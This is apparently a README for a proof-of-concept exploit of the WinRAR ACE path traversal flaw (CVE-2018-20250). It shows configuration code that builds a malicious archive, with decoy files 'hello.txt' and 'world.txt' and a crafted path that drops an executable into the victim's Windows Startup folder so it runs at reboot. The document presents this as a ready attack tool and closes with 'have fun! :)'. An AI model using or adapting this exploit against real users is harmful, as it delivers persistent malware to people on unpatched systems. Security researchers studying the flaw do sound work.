WinRar is a very widely known software for windows. Previous version of WinRaR was a vulnerability which has been patched in Feb-2019. Most of the people didn't update winrar so they are vulnerable in this Absolute Path Traversal bug [CVE-2018-20250]
exp for Extracting Code Execution From Winrar
poc by Ridter
how to use ?
you just need to install python 3.7, and prepare a evil file you want to run, set the values you want, this exp script will generate the evil archive file automatically!
- set the values you want
... ...
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# This command may be different, it depends on the your Python3 environment.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
- run the exp, exp generated the
test.rarautomatically
- if the victim opens the
test.rar, he will see the filehello.txtandworld.txt, you can also add more files, more attractive files.
- when he unpacks the file, the victim's user startup directory will have one more file named
hi.exe, actually it's acalc.exe. when he restart the computer, thehi.exewill run.
have fun! :)